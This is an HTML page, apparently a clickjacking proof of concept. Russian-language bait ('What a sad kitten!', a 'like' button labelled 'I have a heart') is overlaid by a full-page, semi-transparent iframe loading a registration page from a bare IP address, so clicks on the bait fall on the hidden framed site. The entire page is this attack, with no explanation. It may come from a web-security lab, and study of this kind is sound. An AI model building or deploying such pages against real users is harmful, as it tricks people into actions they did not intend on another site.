<html>
    <head>
        <style>
            body {
                position: relative;
                margin: 0;
            }
            iframe {
                border: none;
                position: absolute;
                opacity: 0.5;
                width: 100%;
                height: 100%;
                z-index: 100;
            }

            .kittenHeader {
                position: absolute;
                top: 50px;
                left: 620px;
            }

            .kittenText {
                position: absolute;
                top: 570px;
                left: 470px;
            }

            .kittenLike {
                position: absolute;
                top: 680px;
                left: 670px;
            }

            .sadKitten {
                position: absolute;
                top: 120px;
                left: 500px;
            }
        </style>
    </head>
    <body>
        <div class="kittenHeader">
            <h2>Какой грустный котик!</h2>  
        </div>
        <div class="sadKitten">
            <img src="https://assets.rebelmouse.io/eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpbWFnZSI6Imh0dHBzOi8vYXNzZXRzLnJibC5tcy80MTY2NzQyL29yaWdpbi5qcGciLCJleHBpcmVzX2F0IjoxNzQ3NDI3ODk5fQ.c5oax8NDsJY6LIEO_nutj_yD3phwm52WqqpDPpKYVU4/img.jpg?width=1440&quality=80" width=463 height=463">
        </div>
        <div class="kittenText">
            <h2>Ставь лайк чтобы жалко, посмотрим сколько нас!</h2> 
            <h2>Поможем ему! С каждым нажатием на кнопку он немного счастливее =)</h2>
        </div>
        <div class="kittenLike">
            <button>
                У меня есть сердце
            </button> 
        </div>
        <iframe src="https://45.141.184.169/register.html">
        </iframe>
    </body>
</html>